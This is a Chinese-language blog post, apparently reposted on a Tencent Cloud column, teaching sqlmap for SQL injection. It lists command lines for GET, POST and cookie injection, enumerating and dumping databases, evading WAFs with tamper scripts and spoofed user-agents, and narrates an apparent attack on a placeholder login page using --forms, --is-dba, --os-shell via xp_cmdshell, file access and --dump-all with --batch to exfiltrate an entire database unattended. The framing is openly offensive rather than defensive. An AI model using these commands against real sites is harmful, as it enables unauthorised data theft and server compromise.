前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >sqlmap注入分类

sqlmap注入分类

作者头像
Angel_Kitty
发布2018-04-08 16:29:32
1.3K0
发布2018-04-08 16:29:32
举报

注入分法不同,种类不同,来个简单的分类: 1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”  2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx” 3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2 好,区分完毕再来后续的 需要数据库好:–dbs 得到数据库名称xxx,需要表: -D xxx –tables 得到表名xxxx,需要段:-D xxx -T xxxx –columns 得到段内有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump 那么我们来理解一下,-D -T -C 是干吗的,当然就是知道其名称,指定使用其。 –dbs –tables –columns 是干吗的,当然就是不知道名称,列出来呗 –dump 那自然就是字面意思,类似于导出数据的行为 其实注入有了上面这几个命令,妥妥的够用了,不过还需要绕waf –tamper=”" 注入被识别出来是工具,断开咋办–user-agent=”" 再多牛逼的功能都是慢慢积累出来的,别想一口吃成胖子

好,跑数据库就是这么简单,于是呢来一个稍微有点干货的例子: http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷贝post数据,很麻烦,我想让sqlmap自动跑post注入 sqlmap -u “http://www.xxx.com/login.asp” –forms 很好,上面的命令成功的帮我跑了post注入,并且找到了post的注入点jjj=123 sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs 于是我用上面的命令看看数据库 sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba 顺便看看当前用户是不是dba sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a  用了上面的命令 -a能得到什么呢:自己去看帮助吧。 帮你筛选了一下,-a下面的那些命令是用来看用户,看主机,看权限的。 后来呢,我发现权限还是挺高的,同时呢,我跑出来了数据库名称kkk sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables 同时我找到了网站路径,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以执行系统命令,同时还发现了牛逼的xpcmdshell –os-shell 以及很多牛逼的文件操作命令–file-xx 这些命令在需要用的时候使用就是了,会给你带来意想不到的惊喜 与此同时,我发现tables里面没有我想要的东西,我也找不到合适的内容,咋办呢,心一横,我决定把所有的数据库内容跑出来自己找,于是我这么做: sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all 然后牛逼的sqlmap就开始跑啊跑,然后紧接着我的蛋就碎了,尼玛,sqlmap一会就问你一次要不要破解密码,要不要这个,要不要那个,我和我的小朋友们都想擦你妹夫,功夫不负有心人,我又看见了一个命令 –batch 可以自动选择sqlmap默认选项 于是,我可以和我的小朋友们玩耍去了,再也不用看着sqlmap拖库了。

总结下来,帮助文档还是很重要的,多看看,总会有些收获: 为了避免各位看英文看到吐,大概总结下: Target: 字面意思,目标,那么就是确定目标的 Request: 字面意思,请求,就是定义请求内容的,比如post数据,http头,cookie注入,http头污染等等 Optimization:字面意思,调节性能,等等 Injection: 字面意思,注入的设置内容基本在这里,比如指定注入点,指定db,指定系统,等等 Detection: 基本就是用在确认注入范围,寻找注入点区域,这些 Technique: 基本用在确定注入手段,以及攻击方式 Fingerprint: 基本用在指纹识别,用的很少 Enumeration: 枚举信息,主要用在注入中,很重要,很常用 Brute force: 用来爆破,其实主要是枚举tables columns用的 User-defined function injection: 现在只有udf提权,以及指定一些自己定义的sqlmap脚本用,高端使用,求大牛指点 File system access 主要是文件读取,文件写入 Operating system access  主要用在对系统操作,例如os-shell 以及 后续的连接metasploit 实现后渗透攻击 windows registry access 基本就是注册表操作了 General 字面意思,综合的内容,一些特殊的功能实现,我在这里找到了crawl batch这些非常好用的参数 Miscellaneous

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018-02-28 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档